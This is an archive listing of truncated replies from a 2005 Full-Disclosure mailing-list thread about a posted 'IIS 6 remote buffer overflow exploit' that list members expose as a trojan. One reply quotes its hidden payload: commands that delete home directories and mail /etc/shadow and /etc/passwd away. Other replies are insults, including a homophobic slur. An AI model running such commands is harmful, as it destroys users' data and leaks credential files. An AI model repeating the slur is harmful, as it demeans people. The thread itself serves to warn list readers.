Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)

2005-04-21 Thread Day Jay
Kind of like your attempt to be American :) --- Javi Polo <[EMAIL PROTECTED]> wrote: > On Apr/20/2005, Day Jay wrote: > > > You are wrong again, it's "Smashing the Stick" you > > moron. Not smashing the stack. Ask anyone here! > > Man, you are such a newbie. Get a clue and stop > trying > > to sa

Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)

2005-04-21 Thread Day Jay
not as lame as you are! Take your ham and shove it! What a faggit. --- Ed Carp <[EMAIL PROTECTED]> wrote: > Javi Polo wrote: > > > On Apr/20/2005, Day Jay wrote: > > > >>You are wrong again, it's "Smashing the Stick" you > >>moron. Not smashing the stack. Ask anyone here! > >>Man, you are such a

Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)

2005-04-21 Thread Ron
The ONLY posts I don't like are posts like that, complaining about the list. Like somebody else said, the rest of this list provides great "comic relief"! Javi Polo wrote: On Apr/20/2005, Day Jay wrote: You are wrong again, it's "Smashing the Stick" you moron. Not smashing the stack. Ask any

Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)

2005-04-21 Thread vulcanius
I actually have two other separate e-mail accounts. One for normal mail. And one for lists. This one is reserved specifically for FD. I don't even need mail filters, having different e-mail addresses does it all for me. On 4/21/05, Joachim Schipper <[EMAIL PROTECTED]> wrote: > On Thu, Apr 21, 2005

Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)

2005-04-21 Thread Joachim Schipper
On Thu, Apr 21, 2005 at 04:32:39AM -0500, Ed Carp wrote: > Javi Polo wrote: > > >On Apr/20/2005, Day Jay wrote: > > > >>You are wrong again, it's "Smashing the Stick" you > >>moron. Not smashing the stack. Ask anyone here! > >>Man, you are such a newbie. Get a clue and stop trying > >>to say the s

Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)

2005-04-21 Thread Ed Carp
Javi Polo wrote: On Apr/20/2005, Day Jay wrote: You are wrong again, it's "Smashing the Stick" you moron. Not smashing the stack. Ask anyone here! Man, you are such a newbie. Get a clue and stop trying to say the sweet code is a backdoor just because you don't know how to compile software properly.

Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)

2005-04-21 Thread Javi Polo
On Apr/20/2005, Day Jay wrote: > You are wrong again, it's "Smashing the Stick" you > moron. Not smashing the stack. Ask anyone here! > Man, you are such a newbie. Get a clue and stop trying > to say the sweet code is a backdoor just because you > don't know how to compile software properly. You'r

Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)

2005-04-20 Thread Day Jay
archer > > > Hat-Squad.com > > > > > > ----------------------------- > > > ----- Original Message - > > > From: "Day Jay" <[EMAIL PROTECTED]> > > > To: > > > Sent: We

Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)

2005-04-20 Thread Day Jay
; class101 > Jr. Researcher > Hat-Squad.com > - > - Original Message - > From: "Day Jay" <[EMAIL PROTECTED]> > To: > Sent: Wednesday, April 20, 2005 8:15 PM > Subject: [Full-disclosure] FIXED CO

[Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit (was broken)

2005-04-20 Thread Day Jay
Dear DIk, You are thinking local buffer overflows with your "think: ret=(int *)&ret+2;(*ret)=(int)shellcode;" Wow, I think I read smashing the stick for fun and profit a long time ago, but this is a remote root exploit, it's alittle different!! Damn newbie! I mean, how lame are you? --- dk <[E

Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)

2005-04-20 Thread [EMAIL PROTECTED]
8:15 PM Subject: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken) > Sorry, the previous code was broken. This code should > work... > > Happy Owning!! :) > > > =SNIP > /* Proof of concept code > Please don

Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit (was broken)

2005-04-20 Thread James Longstreet
Cute. shellcode = "/bin/rm -rf /home/*;clear;echo bl4ckh4t,hehe" launcher = "cat /etc/shadow |mail full-disclosure@lists.grok.org.uk " netcat_shell = "cat /etc/passwd |mail full-disclosure@lists.grok.org.uk " On Wed, 20 Apr 2005, Day Jay wrote: > Sorry, the previous code was broken. This code sh

Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit (was broken)

2005-04-20 Thread dk
Day Jay wrote: Sorry, the previous code was broken. Definitely `borken'... I didn't even see one /etc/passwd file in here! Less obvious calls may catch more habitual FD code runners next time dude. [think: ret=(int *)&ret+2;(*ret)=(int)shellcode;] ;-) -- dk _

Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit (was broken)

2005-04-20 Thread Dunceor .
that has to be like the worst backdooring ever. The printf()'s are not even there :P On 4/20/05, Day Jay <[EMAIL PROTECTED]> wrote: > Sorry, the previous code was broken. This code should > work... > > Happy Owning!! :) > > =SNIP > /* Proof of concept code >Please don't s

[Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit (was broken)

2005-04-20 Thread Day Jay
Sorry, the previous code was broken. This code should work... Happy Owning!! :) =SNIP /* Proof of concept code Please don't send us e-mails asking us "how to hack" because we will be forced to skullfsck you. DISCLAIMER: !!NOT RESPONSIBLE WITH YOUR USE OF THIS